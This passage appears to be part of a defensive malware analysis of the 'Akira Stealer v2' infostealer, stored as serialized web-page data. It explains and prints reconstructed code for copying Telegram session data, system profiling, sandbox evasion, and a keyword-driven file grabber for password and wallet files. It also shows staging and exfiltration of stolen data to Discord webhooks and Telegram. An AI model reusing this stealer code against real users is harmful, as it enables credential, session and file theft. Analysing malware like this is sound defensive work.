f\"{os.getenv('APPDATA')}/Telegram Desktop/tdata\"\n",[1588,15024,15025],{"class":1590,"line":1831},[1588,15026,15027],{},"    Utils.TaskKill(\"telegram.exe\")\n",[1588,15029,15030],{"class":1590,"line":2135},[1588,15031,15032],{},"    shutil.copytree(src, os.path.join(Utils.get_temp_folder(), \"Telegram\"))\n",[2738,15034,15035,15041,15050],{},[2741,15036,15037,15040],{},[1736,15038,15039],{},"Process Termination",": Ensures file locks are released.",[2741,15042,15043,15046,15047,15049],{},[1736,15044,15045],{},"Recursive Copy",": Steals ",[1524,15048,14284],{}," folder, including user sessions, contacts, and cached messages.",[2741,15051,15052,15054,15055,15058],{},[1736,15053,7374],{},": The stolen folder is zipped and uploaded via ",[1524,15056,15057],{},"sendFilesTG()",", with the download link embedded in a Telegram message.",[806,15060,15061,15062,15064],{},"Akira Stealer’s ",[1524,15063,7358],{}," module combines regex-based scraping, DPAPI-backed AES-GCM decryption, live API validation, and multi-protocol exfiltration (webhook + Telegram) to deliver a seamless account takeover capability across both Discord and Telegram platforms.",[810,15066,15068],{"id":15067},"_710-system-profiling","7.10 System Profiling",[806,15070,1536],{},[806,15072,15073,15074,15077],{},"Akira Stealer v2 incorporates an extensive system profiling phase to gather host metadata, environment attributes, and network details. This information is collated in the ",[1524,15075,15076],{},"Data"," class and later packaged with exfiltrated credentials. 
Below, we break down the profiling logic with direct code references.",[1671,15079,15081,15082,15084],{"id":15080},"_7101-data-class-initialization","7.10.1 ",[1524,15083,15076],{}," Class Initialization",[806,15086,1677],{},[806,15088,15089,15090,15092],{},"On startup, an instance of ",[1524,15091,15076],{}," is created:",[1545,15094,15096],{"className":10501,"code":15095,"language":10503,"meta":863,"style":863},"class Data:\n    def __init__(self):\n        self.username = os.getlogin()\n        self.computerName = os.getenv(\"computername\") or \"Unable to get computer name\"\n        self.system_info = f\"Computer Name: {self.computerName}\\n...\"\n        ...\n        self.ip = requests.get(url=\"https://api.ipify.org\").text\n        ipdata = json.loads(requests.post(url=f\"http://ip-api.com/json/{self.ip}\").text)\n        self.country = ipdata.get(\"country\")\n        self.countryCode = ipdata.get(\"countryCode\", \"\").lower()\n",[1524,15097,15098,15103,15108,15113,15118,15123,15128,15133,15138,15143],{"__ignoreMap":863},[1588,15099,15100],{"class":1590,"line":1591},[1588,15101,15102],{},"class Data:\n",[1588,15104,15105],{"class":1590,"line":864},[1588,15106,15107],{},"    def __init__(self):\n",[1588,15109,15110],{"class":1590,"line":1814},[1588,15111,15112],{},"        self.username = os.getlogin()\n",[1588,15114,15115],{"class":1590,"line":1831},[1588,15116,15117],{},"        self.computerName = os.getenv(\"computername\") or \"Unable to get computer name\"\n",[1588,15119,15120],{"class":1590,"line":2135},[1588,15121,15122],{},"        self.system_info = f\"Computer Name: {self.computerName}\\n...\"\n",[1588,15124,15125],{"class":1590,"line":2141},[1588,15126,15127],{},"        ...\n",[1588,15129,15130],{"class":1590,"line":2147},[1588,15131,15132],{},"        self.ip = requests.get(url=\"https://api.ipify.org\").text\n",[1588,15134,15135],{"class":1590,"line":2153},[1588,15136,15137],{},"        ipdata = 
json.loads(requests.post(url=f\"http://ip-api.com/json/{self.ip}\").text)\n",[1588,15139,15140],{"class":1590,"line":2159},[1588,15141,15142],{},"        self.country = ipdata.get(\"country\")\n",[1588,15144,15145],{"class":1590,"line":2165},[1588,15146,15147],{},"        self.countryCode = ipdata.get(\"countryCode\", \"\").lower()\n",[2738,15149,15150,15163],{},[2741,15151,15152,15155,15156,5611,15159,15162],{},[1736,15153,15154],{},"Username & Hostname:"," Retrieved via ",[1524,15157,15158],{},"os.getlogin()",[1524,15160,15161],{},"COMPUTERNAME"," environment variable.",[2741,15164,15165,15168,15169,15172,15173,15175],{},[1736,15166,15167],{},"IP Address:"," Fetched with ",[1524,15170,15171],{},"requests.get(\"https://api.ipify.org\")",", then geolocated via ",[1524,15174,11337],{}," for country and ISO code.",[1671,15177,15179],{"id":15178},"_7102-os-and-hardware-enumeration","7.10.2 OS and Hardware Enumeration",[806,15181,1677],{},[806,15183,15184],{},"Using Windows Management Instrumentation (WMI) commands:",[1545,15186,15188],{"className":10501,"code":15187,"language":10503,"meta":863,"style":863},"# Operating System\nself.computerOS = subprocess.run('wmic os get Caption', shell=True, capture_output=True).stdout\n# Total Physical Memory\nself.totalMemory = subprocess.run('wmic computersystem get totalphysicalmemory', ...)\n# BIOS UUID\nself.uuid = subprocess.run('wmic csproduct get uuid', ...)\n# CPU Identifier\nself.cpu = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:System...\\Processor_Identifier'\", ...)\n# GPU Name\nself.gpu = subprocess.run('wmic path win32_VideoController get name', ...)\n# Windows Product Key\nself.productKey = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\\\Microsoft\\\\Windows NT...SoftwareProtectionPlatform' -Name BackupProductKeyDefault\", 
...)\n",[1524,15189,15190,15195,15200,15205,15210,15215,15220,15225,15230,15235,15240,15245],{"__ignoreMap":863},[1588,15191,15192],{"class":1590,"line":1591},[1588,15193,15194],{},"# Operating System\n",[1588,15196,15197],{"class":1590,"line":864},[1588,15198,15199],{},"self.computerOS = subprocess.run('wmic os get Caption', shell=True, capture_output=True).stdout\n",[1588,15201,15202],{"class":1590,"line":1814},[1588,15203,15204],{},"# Total Physical Memory\n",[1588,15206,15207],{"class":1590,"line":1831},[1588,15208,15209],{},"self.totalMemory = subprocess.run('wmic computersystem get totalphysicalmemory', ...)\n",[1588,15211,15212],{"class":1590,"line":2135},[1588,15213,15214],{},"# BIOS UUID\n",[1588,15216,15217],{"class":1590,"line":2141},[1588,15218,15219],{},"self.uuid = subprocess.run('wmic csproduct get uuid', ...)\n",[1588,15221,15222],{"class":1590,"line":2147},[1588,15223,15224],{},"# CPU Identifier\n",[1588,15226,15227],{"class":1590,"line":2153},[1588,15228,15229],{},"self.cpu = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:System...\\Processor_Identifier'\", ...)\n",[1588,15231,15232],{"class":1590,"line":2159},[1588,15233,15234],{},"# GPU Name\n",[1588,15236,15237],{"class":1590,"line":2165},[1588,15238,15239],{},"self.gpu = subprocess.run('wmic path win32_VideoController get name', ...)\n",[1588,15241,15242],{"class":1590,"line":11039},[1588,15243,15244],{},"# Windows Product Key\n",[1588,15246,15247],{"class":1590,"line":11045},[1588,15248,15249],{},"self.productKey = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\\\Microsoft\\\\Windows NT...SoftwareProtectionPlatform' -Name BackupProductKeyDefault\", ...)\n",[806,15251,15252,15253,15256],{},"Results are parsed to human-readable strings (",[1524,15254,15255],{},"strip()",", index operations) and concatenated into:",[1545,15258,15260],{"className":10501,"code":15259,"language":10503,"meta":863,"style":863},"self.system_info = (\n    f\"Computer Name: 
{self.computerName}\\n\"\n    f\"Total Memory: {self.totalMemory}\\n\"\n    f\"CPU: {self.cpu}\\n\"\n    f\"GPU: {self.gpu}\\n\"\n    f\"Product Key: {self.productKey}\"\n)\n",[1524,15261,15262,15267,15272,15277,15282,15287,15292],{"__ignoreMap":863},[1588,15263,15264],{"class":1590,"line":1591},[1588,15265,15266],{},"self.system_info = (\n",[1588,15268,15269],{"class":1590,"line":864},[1588,15270,15271],{},"    f\"Computer Name: {self.computerName}\\n\"\n",[1588,15273,15274],{"class":1590,"line":1814},[1588,15275,15276],{},"    f\"Total Memory: {self.totalMemory}\\n\"\n",[1588,15278,15279],{"class":1590,"line":1831},[1588,15280,15281],{},"    f\"CPU: {self.cpu}\\n\"\n",[1588,15283,15284],{"class":1590,"line":2135},[1588,15285,15286],{},"    f\"GPU: {self.gpu}\\n\"\n",[1588,15288,15289],{"class":1590,"line":2141},[1588,15290,15291],{},"    f\"Product Key: {self.productKey}\"\n",[1588,15293,15294],{"class":1590,"line":2147},[1588,15295,11258],{},[1671,15297,15299],{"id":15298},"_7103-vm-detection-anti-sandbox-checks","7.10.3 VM Detection & Anti-Sandbox Checks",[806,15301,1677],{},[806,15303,15304,15305,15307],{},"Before deep profiling, the malware invokes ",[1524,15306,10674],{}," to detect virtualization or analysis environments:",[1545,15309,15311],{"className":10501,"code":15310,"language":10503,"meta":863,"style":863},"if VmProtect.isVM(1):\n    sys.exit()\n",[1524,15312,15313,15318],{"__ignoreMap":863},[1588,15314,15315],{"class":1590,"line":1591},[1588,15316,15317],{},"if VmProtect.isVM(1):\n",[1588,15319,15320],{"class":1590,"line":864},[1588,15321,15322],{},"    sys.exit()\n",[806,15324,15325],{},"Key checks include:",[2738,15327,15328,15334,15340,15346],{},[2741,15329,15330,15333],{},[1736,15331,15332],{},"Registry Keys & Driver Descriptors",": Queries virtualization-related registry entries.",[2741,15335,15336,15339],{},[1736,15337,15338],{},"Blacklisted UUIDs & Computer Names",": Matches against known VM 
fingerprints.",[2741,15341,15342,15345],{},[1736,15343,15344],{},"HTTP Simulation",": Attempts to connect to a nonexistent domain under HTTPS.",[2741,15347,15348,15351,15352,2289,15355,2289,15358,2786],{},[1736,15349,15350],{},"Process Blacklist",": Spawns a background thread to kill tools like ",[1524,15353,15354],{},"wireshark",[1524,15356,15357],{},"ollydbg",[1524,15359,15360],{},"ida64",[1671,15362,15364],{"id":15363},"_7104-packaging-transmission","7.10.4 Packaging & Transmission",[806,15366,1677],{},[806,15368,15369,15370,15373],{},"The collected ",[1524,15371,15372],{},"system_info",", IP, and country flag are embedded in the webhook payload headers:",[1545,15375,15377],{"className":10501,"code":15376,"language":10503,"meta":863,"style":863},"webhook_payload = {\n    \"embeds\": [{\n        \"title\": f\"💉 Infected {self.computerName}/{self.username} | {self.ip} {flag}\",\n        \"description\": description + \"\\n```⚙️ System Info\\n\" + self.system_info + \"```\",\n        \"fields\": [...]\n    }]\n}\nrequests.post(self.webhook_url, json=webhook_payload)\n",[1524,15378,15379,15384,15389,15394,15399,15404,15409,15413],{"__ignoreMap":863},[1588,15380,15381],{"class":1590,"line":1591},[1588,15382,15383],{},"webhook_payload = {\n",[1588,15385,15386],{"class":1590,"line":864},[1588,15387,15388],{},"    \"embeds\": [{\n",[1588,15390,15391],{"class":1590,"line":1814},[1588,15392,15393],{},"        \"title\": f\"💉 Infected {self.computerName}/{self.username} | {self.ip} {flag}\",\n",[1588,15395,15396],{"class":1590,"line":1831},[1588,15397,15398],{},"        \"description\": description + \"\\n```⚙️ System Info\\n\" + self.system_info + \"```\",\n",[1588,15400,15401],{"class":1590,"line":2135},[1588,15402,15403],{},"        \"fields\": [...]\n",[1588,15405,15406],{"class":1590,"line":2141},[1588,15407,15408],{},"    
}]\n",[1588,15410,15411],{"class":1590,"line":2147},[1588,15412,8430],{},[1588,15414,15415],{"class":1590,"line":2153},[1588,15416,15417],{},"requests.post(self.webhook_url, json=webhook_payload)\n",[2738,15419,15420,15426],{},[2741,15421,15422,15425],{},[1736,15423,15424],{},"Flag Emoji",": Derived from ISO country code.",[2741,15427,15428,15431],{},[1736,15429,15430],{},"Fields",": Include counts of stolen passwords, cookies, etc., but the system info is in the embed description for immediate context.",[806,15433,15434,15437],{},[1736,15435,15436],{},"Summary:","\nSystem profiling in Akira Stealer v2 gathers comprehensive host and network data via WMI commands, environment variables, and IP geolocation. Coupled with VM detection and tool-killing routines, this ensures the attacker has a full snapshot of the compromised environment, enhancing targeted follow-up actions and filtering out analysis sandboxes.",[810,15439,15441,15442,2772],{"id":15440},"_711-file-grabber-class-utilssteal_files","7.11 File Grabber (Class: ",[1524,15443,15444],{},"Utils.steal_files",[806,15446,1536],{},[806,15448,15449],{},"Beyond browser data and tokens, Akira also attempts to extract valuable user-generated content—such as documents, spreadsheets, private notes, and cryptographic key files. The File Grabber module is responsible for this task. It operates by scanning high-value directories for common file types and patterns, then silently adding them to the exfiltration bundle. What makes this module especially dangerous is its simplicity and focus: it doesn’t attempt to crawl the entire file system. Instead, it targets specific, high-probability locations where sensitive files are typically stored. These include the Desktop, Documents, Downloads, and OneDrive directories—each relative to the user's home path. This focused approach improves both speed and stealth, reducing the likelihood of detection during the scan. 
It also avoids alerting the user by not accessing system or protected directories. Once files of interest are located, they are copied into a temporary folder, optionally renamed or grouped, and later compressed into the final ZIP archive that’s uploaded in the exfiltration phase.",[1671,15451,15453],{"id":15452},"_7111-target-directories-enumeration","7.11.1 Target Directories Enumeration",[806,15455,1677],{},[806,15457,15458],{},"The stealer focuses on four high-yield folders:",[1545,15460,15462],{"className":10501,"code":15461,"language":10503,"meta":863,"style":863},"searchFolders = [\n    \"Desktop\",\n    \"Documents\",\n    \"Downloads\",\n    \"OneDrive\"\n]\n",[1524,15463,15464,15469,15474,15479,15484,15489],{"__ignoreMap":863},[1588,15465,15466],{"class":1590,"line":1591},[1588,15467,15468],{},"searchFolders = [\n",[1588,15470,15471],{"class":1590,"line":864},[1588,15472,15473],{},"    \"Desktop\",\n",[1588,15475,15476],{"class":1590,"line":1814},[1588,15477,15478],{},"    \"Documents\",\n",[1588,15480,15481],{"class":1590,"line":1831},[1588,15482,15483],{},"    \"Downloads\",\n",[1588,15485,15486],{"class":1590,"line":2135},[1588,15487,15488],{},"    \"OneDrive\"\n",[1588,15490,15491],{"class":1590,"line":2141},[1588,15492,13933],{},[806,15494,15495],{},"Each folder is interpreted relative to the victim’s home directory:",[1545,15497,15499],{"className":10501,"code":15498,"language":10503,"meta":863,"style":863},"for folder in searchFolders:\n    current_path = os.path.join(os.environ['USERPROFILE'], folder)\n    if os.path.exists(current_path):\n        # proceed to scan\n",[1524,15500,15501,15506,15511,15516],{"__ignoreMap":863},[1588,15502,15503],{"class":1590,"line":1591},[1588,15504,15505],{},"for folder in searchFolders:\n",[1588,15507,15508],{"class":1590,"line":864},[1588,15509,15510],{},"    current_path = os.path.join(os.environ['USERPROFILE'], folder)\n",[1588,15512,15513],{"class":1590,"line":1814},[1588,15514,15515],{},"    if 
os.path.exists(current_path):\n",[1588,15517,15518],{"class":1590,"line":1831},[1588,15519,15520],{},"        # proceed to scan\n",[1671,15522,15524],{"id":15523},"_7112-keyword-extension-filtering","7.11.2 Keyword & Extension Filtering",[806,15526,1677],{},[806,15528,15529],{},[1736,15530,15531],{},"Keyword List",[806,15533,15534],{},"A predefined set of substrings guides file selection. Only filenames containing at least one keyword are considered:",[1545,15536,15538],{"className":10501,"code":15537,"language":10503,"meta":863,"style":863},"keywordsFiles = [\n    \"passw\", \"seed\", \"mnemo\", \"phrase\", \"login\", \"wallet\",\n    \"crypto\", \"token\", \"backup\", \"secret\", \"account\"\n]\n",[1524,15539,15540,15545,15550,15555],{"__ignoreMap":863},[1588,15541,15542],{"class":1590,"line":1591},[1588,15543,15544],{},"keywordsFiles = [\n",[1588,15546,15547],{"class":1590,"line":864},[1588,15548,15549],{},"    \"passw\", \"seed\", \"mnemo\", \"phrase\", \"login\", \"wallet\",\n",[1588,15551,15552],{"class":1590,"line":1814},[1588,15553,15554],{},"    \"crypto\", \"token\", \"backup\", \"secret\", \"account\"\n",[1588,15556,15557],{"class":1590,"line":1831},[1588,15558,13933],{},[2738,15560,15561,15577],{},[2741,15562,15563,15566,15567,15570,15571,5611,15574,2786],{},[1736,15564,15565],{},"Partial Matches",": Keywords like ",[1524,15568,15569],{},"passw"," capture both ",[1524,15572,15573],{},"passwords.txt",[1524,15575,15576],{},"passw_backup.docx",[2741,15578,15579,15582],{},[1736,15580,15581],{},"Broad Coverage",": Encompasses authentication, wallet, crypto, and token-related terms.",[1671,15584,15586],{"id":15585},"_7113-allowed-file-types","7.11.3 Allowed File Types",[806,15588,1677],{},[806,15590,15591],{},"To minimize noise, a whitelist of extensions is enforced:",[1545,15593,15595],{"className":10501,"code":15594,"language":10503,"meta":863,"style":863},"allowed_extensions = [\n    \".txt\", \".doc\", \".docx\", \".pdf\", \".csv\", \".xls\", \".xlsx\",\n 
   \".jpg\", \".png\"\n]\n",[1524,15596,15597,15602,15607,15612],{"__ignoreMap":863},[1588,15598,15599],{"class":1590,"line":1591},[1588,15600,15601],{},"allowed_extensions = [\n",[1588,15603,15604],{"class":1590,"line":864},[1588,15605,15606],{},"    \".txt\", \".doc\", \".docx\", \".pdf\", \".csv\", \".xls\", \".xlsx\",\n",[1588,15608,15609],{"class":1590,"line":1814},[1588,15610,15611],{},"    \".jpg\", \".png\"\n",[1588,15613,15614],{"class":1590,"line":1831},[1588,15615,13933],{},[1671,15617,15619],{"id":15618},"_7113-size-constraint","7.11.3 Size Constraint",[806,15621,1677],{},[806,15623,15624],{},"Files larger than 2 megabytes are skipped to optimize exfiltration speed and avoid large transfers:",[1545,15626,15628],{"className":10501,"code":15627,"language":10503,"meta":863,"style":863},"file_size_mb = os.path.getsize(full_path) / (1024 * 1024)\nif file_size_mb \u003C= 2:\n    # eligible for copy\n",[1524,15629,15630,15635,15640],{"__ignoreMap":863},[1588,15631,15632],{"class":1590,"line":1591},[1588,15633,15634],{},"file_size_mb = os.path.getsize(full_path) / (1024 * 1024)\n",[1588,15636,15637],{"class":1590,"line":864},[1588,15638,15639],{},"if file_size_mb \u003C= 2:\n",[1588,15641,15642],{"class":1590,"line":1814},[1588,15643,15644],{},"    # eligible for copy\n",[1671,15646,15648],{"id":15647},"_7114-recursive-scanning-copy-logic","7.11.4 Recursive Scanning & Copy Logic",[806,15650,1677],{},[806,15652,15653],{},"Once the high-value directories have been identified, Akira initiates a recursive scanning routine to traverse subfolders and locate files matching specific keywords and extensions. This phase is built for precision and stealth: only files that match pre-defined criteria—such as filenames containing sensitive keywords and approved filetypes—are considered. The logic ensures that only relevant, user-generated content is exfiltrated. 
It ignores system files, caches, and binaries, and limits the size of any single file to 2 MB to reduce upload size and detection risk. This scanning method is silent, efficient, and optimized for stealthy data theft in real-world environments. By copying matching files into a staging folder and maintaining a list of what was taken, Akira prepares the content for bundling and exfiltration—while minimizing duplication and operational noise.",[806,15655,15656,15657,15660],{},"The core routine ",[1524,15658,15659],{},"steal_files()"," operates as follows:",[1545,15662,15664],{"className":10501,"code":15663,"language":10503,"meta":863,"style":863},"@staticmethod\ndef steal_files():\n    stolen_files = set()\n    temp_folder = Utils.get_temp_folder()\n\n    for folder in searchFolders:\n        current_path = os.path.join(os.environ['USERPROFILE'], folder)\n        if os.path.exists(current_path):\n            for root, _, files in os.walk(current_path):\n                for file in files:\n                    lower = file.lower()\n                    # Keyword check\n                    if any(keyword in lower for keyword in keywordsFiles):\n                        ext = os.path.splitext(lower)[1]\n                        # Extension and size check\n                        if ext in allowed_extensions and os.path.getsize(os.path.join(root, file)) \u003C= 2 * 1024 * 1024:\n                            # Prepare destination\n                            files_dir = os.path.join(temp_folder, \"Files\")\n                            os.makedirs(files_dir, exist_ok=True)\n                            shutil.copy(os.path.join(root, file), os.path.join(files_dir, file))\n                            stolen_files.add(file)\n    
data.stolen_files.extend(stolen_files)\n",[1524,15665,15666,15670,15675,15680,15685,15689,15694,15699,15704,15709,15714,15719,15724,15729,15734,15739,15744,15749,15754,15759,15764,15769],{"__ignoreMap":863},[1588,15667,15668],{"class":1590,"line":1591},[1588,15669,10991],{},[1588,15671,15672],{"class":1590,"line":864},[1588,15673,15674],{},"def steal_files():\n",[1588,15676,15677],{"class":1590,"line":1814},[1588,15678,15679],{},"    stolen_files = set()\n",[1588,15681,15682],{"class":1590,"line":1831},[1588,15683,15684],{},"    temp_folder = Utils.get_temp_folder()\n",[1588,15686,15687],{"class":1590,"line":2135},[1588,15688,9865],{"emptyLinePlaceholder":508},[1588,15690,15691],{"class":1590,"line":2141},[1588,15692,15693],{},"    for folder in searchFolders:\n",[1588,15695,15696],{"class":1590,"line":2147},[1588,15697,15698],{},"        current_path = os.path.join(os.environ['USERPROFILE'], folder)\n",[1588,15700,15701],{"class":1590,"line":2153},[1588,15702,15703],{},"        if os.path.exists(current_path):\n",[1588,15705,15706],{"class":1590,"line":2159},[1588,15707,15708],{},"            for root, _, files in os.walk(current_path):\n",[1588,15710,15711],{"class":1590,"line":2165},[1588,15712,15713],{},"                for file in files:\n",[1588,15715,15716],{"class":1590,"line":11039},[1588,15717,15718],{},"                    lower = file.lower()\n",[1588,15720,15721],{"class":1590,"line":11045},[1588,15722,15723],{},"                    # Keyword check\n",[1588,15725,15726],{"class":1590,"line":11051},[1588,15727,15728],{},"                    if any(keyword in lower for keyword in keywordsFiles):\n",[1588,15730,15731],{"class":1590,"line":11057},[1588,15732,15733],{},"                        ext = os.path.splitext(lower)[1]\n",[1588,15735,15736],{"class":1590,"line":11063},[1588,15737,15738],{},"                        # Extension and size check\n",[1588,15740,15741],{"class":1590,"line":11069},[1588,15742,15743],{},"                        if ext in 
allowed_extensions and os.path.getsize(os.path.join(root, file)) \u003C= 2 * 1024 * 1024:\n",[1588,15745,15746],{"class":1590,"line":11075},[1588,15747,15748],{},"                            # Prepare destination\n",[1588,15750,15751],{"class":1590,"line":11081},[1588,15752,15753],{},"                            files_dir = os.path.join(temp_folder, \"Files\")\n",[1588,15755,15756],{"class":1590,"line":11087},[1588,15757,15758],{},"                            os.makedirs(files_dir, exist_ok=True)\n",[1588,15760,15761],{"class":1590,"line":11093},[1588,15762,15763],{},"                            shutil.copy(os.path.join(root, file), os.path.join(files_dir, file))\n",[1588,15765,15766],{"class":1590,"line":11099},[1588,15767,15768],{},"                            stolen_files.add(file)\n",[1588,15770,15771],{"class":1590,"line":11105},[1588,15772,15773],{},"    data.stolen_files.extend(stolen_files)\n",[806,15775,15776],{},[1736,15777,15778],{},"Key points:",[4351,15780,15781,15789,15798,15807,15813],{},[2741,15782,15783,15788],{},[1736,15784,15785],{},[1524,15786,15787],{},"os.walk",": Recursively descends into subdirectories.",[2741,15790,15791,15794,15795,2786],{},[1736,15792,15793],{},"Case-insensitive matching",": Filenames are normalized via ",[1524,15796,15797],{},"lower()",[2741,15799,15800,15803,15804,15806],{},[1736,15801,15802],{},"Atomic copy",": Uses ",[1524,15805,13799],{}," to preserve file content.",[2741,15808,15809,15812],{},[1736,15810,15811],{},"Set of stolen filenames",": Prevents duplicate copies when the same file appears twice.",[2741,15814,15815,2545,15820,15823],{},[1736,15816,15817,15818],{},"Integration with ",[1524,15819,15076],{},[1524,15821,15822],{},"data.stolen_files"," accumulates the stolen file list for later reporting.",[1671,15825,15827],{"id":15826},"_7115-archiving-and-exfiltration","7.11.5 Archiving and Exfiltration",[806,15829,1677],{},[806,15831,15832,15833,15835],{},"After collection, the ",[1524,15834,14281],{}," folder 
is zipped and dispatched:",[1545,15837,15839],{"className":10501,"code":15838,"language":10503,"meta":863,"style":863},"# Archive\nUtils.zip_client_file()  # creates CLIENT.zip from temp_folder\n\n# Upload & Notify\nakira.sendFilesTG(Utils.get_temp_folder(), startup)\nhook.sendFilesTG(Utils.get_temp_folder(), startup)\n",[1524,15840,15841,15846,15851,15855,15860,15865],{"__ignoreMap":863},[1588,15842,15843],{"class":1590,"line":1591},[1588,15844,15845],{},"# Archive\n",[1588,15847,15848],{"class":1590,"line":864},[1588,15849,15850],{},"Utils.zip_client_file()  # creates CLIENT.zip from temp_folder\n",[1588,15852,15853],{"class":1590,"line":1814},[1588,15854,9865],{"emptyLinePlaceholder":508},[1588,15856,15857],{"class":1590,"line":1831},[1588,15858,15859],{},"# Upload & Notify\n",[1588,15861,15862],{"class":1590,"line":2135},[1588,15863,15864],{},"akira.sendFilesTG(Utils.get_temp_folder(), startup)\n",[1588,15866,15867],{"class":1590,"line":2141},[1588,15868,15869],{},"hook.sendFilesTG(Utils.get_temp_folder(), startup)\n",[2738,15871,15872,15887],{},[2741,15873,15874,15879,15880,2289,15882,2289,15884,9904],{},[1736,15875,15876],{},[1524,15877,15878],{},"zip_client_file()",": Compresses the entire temp directory, including ",[1524,15881,14281],{},[1524,15883,12335],{},[1524,15885,15886],{},"Passwords",[2741,15888,15889,15893,15894],{},[1736,15890,15891],{},[1524,15892,15057],{},": Posts the download link via Telegram or Discord webhook, listing each stolen filename:",[1545,15895,15897],{"className":10501,"code":15896,"language":10503,"meta":863,"style":863},"fields.append({\n\"name\": \"📂 Files\",\n\"value\": \"`\" + \"\\n\".join(data.stolen_files) + \"`\",\n\"inline\": False\n})\n",[1524,15898,15899,15904,15909,15914,15919],{"__ignoreMap":863},[1588,15900,15901],{"class":1590,"line":1591},[1588,15902,15903],{},"fields.append({\n",[1588,15905,15906],{"class":1590,"line":864},[1588,15907,15908],{},"\"name\": \"📂 
Files\",\n",[1588,15910,15911],{"class":1590,"line":1814},[1588,15912,15913],{},"\"value\": \"`\" + \"\\n\".join(data.stolen_files) + \"`\",\n",[1588,15915,15916],{"class":1590,"line":1831},[1588,15917,15918],{},"\"inline\": False\n",[1588,15920,15921],{"class":1590,"line":2135},[1588,15922,15923],{},"})\n",[806,15925,15926],{},[1736,15927,15928],{},"Conclusion:",[806,15930,15931],{},"The File Grabber in Akira Stealer v2 systematically hunts for sensitive documents using keyword and extension filters, respects a 2 MB size cap for efficiency, and consolidates stolen items into an archive. Its design ensures both breadth (multiple folders) and precision (targeted filters), making it one of the most impactful stages of the malware’s lifecycle.",[810,15933,15935],{"id":15934},"_712-exfiltration-strategy","7.12 Exfiltration Strategy",[806,15937,1536],{},[806,15939,15940],{},"The exfiltration module handles harvested tokens and additional artifacts (cookies, autofills, logs) by staging them in a structured directory, compressing into an archive, uploading to multiple online file hosts, and sending detailed webhook notifications. This section deconstructs each step with file paths, domain endpoints, and code references for full traceability.",[1671,15942,15944],{"id":15943},"_7121-directory-layout-filenames","7.12.1 Directory Layout & Filenames",[806,15946,1677],{},[806,15948,15949],{},"Akira organizes all collected artifacts into a clean and hierarchical temporary directory structure. This design allows for efficient packaging and easy post-exfiltration review by the attacker. Each data category—such as Tokens, Cookies, Passwords, or Screenshots—is stored in its own subfolder under a root path named after the victim’s computer (e.g., DESKTOP1234). This structured layout ensures clarity, minimizes duplication, and streamlines the archiving and upload process. 
It also makes automated parsing or manual inspection much easier on the attacker side.",[1545,15951,15954],{"className":15952,"code":15953,"language":916},[1548],"C:\\Users\\User\\AppData\\Local\\Temp\\DESKTOP1234\\\n├─ Tokens\\\n│   ├ token_ab12cd34.txt\n│   └ token_ef56gh78.txt\n├─ Cookies\\\n│   ├ Chrome_Cookies.txt\n│   └ Discord_Cookies.txt\n├─ Autofill\\\n├─ Passwords\\\n├─ Logs\\\n└─ Screenshots\\\n",[1524,15955,15953],{"__ignoreMap":863},[1671,15957,15959],{"id":15958},"_7122-token-artifact-staging","7.12.2 Token & Artifact Staging",[806,15961,1677],{},[806,15963,15964],{},"Before exfiltration, Akira stages all relevant artifacts in the corresponding subfolders. Token values, for instance, are written into individual .txt files to facilitate quick scanning and validation. Cookies, autofill entries, and passwords are similarly written into structured text files named by browser. This step standardizes the data layout, enabling automated tooling to track what was harvested. It also ensures that the zip archive later reflects a predictable and attacker-friendly format, regardless of which modules were triggered.",[1545,15966,15968],{"className":10501,"code":15967,"language":10503,"meta":863,"style":863},"import os, shutil\n# Constants\nTMP = os.getenv('TEMP')\nROOT = os.path.join(TMP, os.getenv('COMPUTERNAME'))\n# Prepare structure\nfor sub in ['Tokens','Cookies','Autofill','Passwords','Logs','Screenshots']:\n    os.makedirs(os.path.join(ROOT, sub), exist_ok=True)\n# Save token\nwith open(os.path.join(ROOT, 'Tokens', f'token_{token[:8]}.txt'), 'w') as f:\n    f.write(token)\n",[1524,15969,15970,15975,15980,15985,15990,15995,16000,16005,16010,16015],{"__ignoreMap":863},[1588,15971,15972],{"class":1590,"line":1591},[1588,15973,15974],{},"import os, shutil\n",[1588,15976,15977],{"class":1590,"line":864},[1588,15978,15979],{},"# Constants\n",[1588,15981,15982],{"class":1590,"line":1814},[1588,15983,15984],{},"TMP = 
os.getenv('TEMP')\n",[1588,15986,15987],{"class":1590,"line":1831},[1588,15988,15989],{},"ROOT = os.path.join(TMP, os.getenv('COMPUTERNAME'))\n",[1588,15991,15992],{"class":1590,"line":2135},[1588,15993,15994],{},"# Prepare structure\n",[1588,15996,15997],{"class":1590,"line":2141},[1588,15998,15999],{},"for sub in ['Tokens','Cookies','Autofill','Passwords','Logs','Screenshots']:\n",[1588,16001,16002],{"class":1590,"line":2147},[1588,16003,16004],{},"    os.makedirs(os.path.join(ROOT, sub), exist_ok=True)\n",[1588,16006,16007],{"class":1590,"line":2153},[1588,16008,16009],{},"# Save token\n",[1588,16011,16012],{"class":1590,"line":2159},[1588,16013,16014],{},"with open(os.path.join(ROOT, 'Tokens', f'token_{token[:8]}.txt'), 'w') as f:\n",[1588,16016,16017],{"class":1590,"line":2165},[1588,16018,16019],{},"    f.write(token)\n",[2738,16021,16022,16025],{},[2741,16023,16024],{},"Tokens saved in separate small text files for quick inspection.",[2741,16026,16027,16028,16031,16032,2786],{},"Cookie dumps from ",[1524,16029,16030],{},"Chromium.GetCookies()"," written to ",[1524,16033,16034],{},"{Browser}_Cookies.txt",[1671,16036,16038],{"id":16037},"_7133-zip-archive-creation","7.13.3 ZIP Archive Creation",[806,16040,1677],{},[806,16042,16043,16044],{},"Once staging is complete, Akira compresses the entire directory into a single ZIP archive. The archive filename follows a consistent naming convention: ",[16045,16046,16047,16048],"computer-name",{},"_",[16049,16050,16051],"timestamp",{},".zip, using the host’s machine name and a UTC timestamp in ISO 8601 format. This ensures both uniqueness and chronological traceability. By walking the entire staging directory recursively, every file is preserved in its relative structure within the ZIP. 
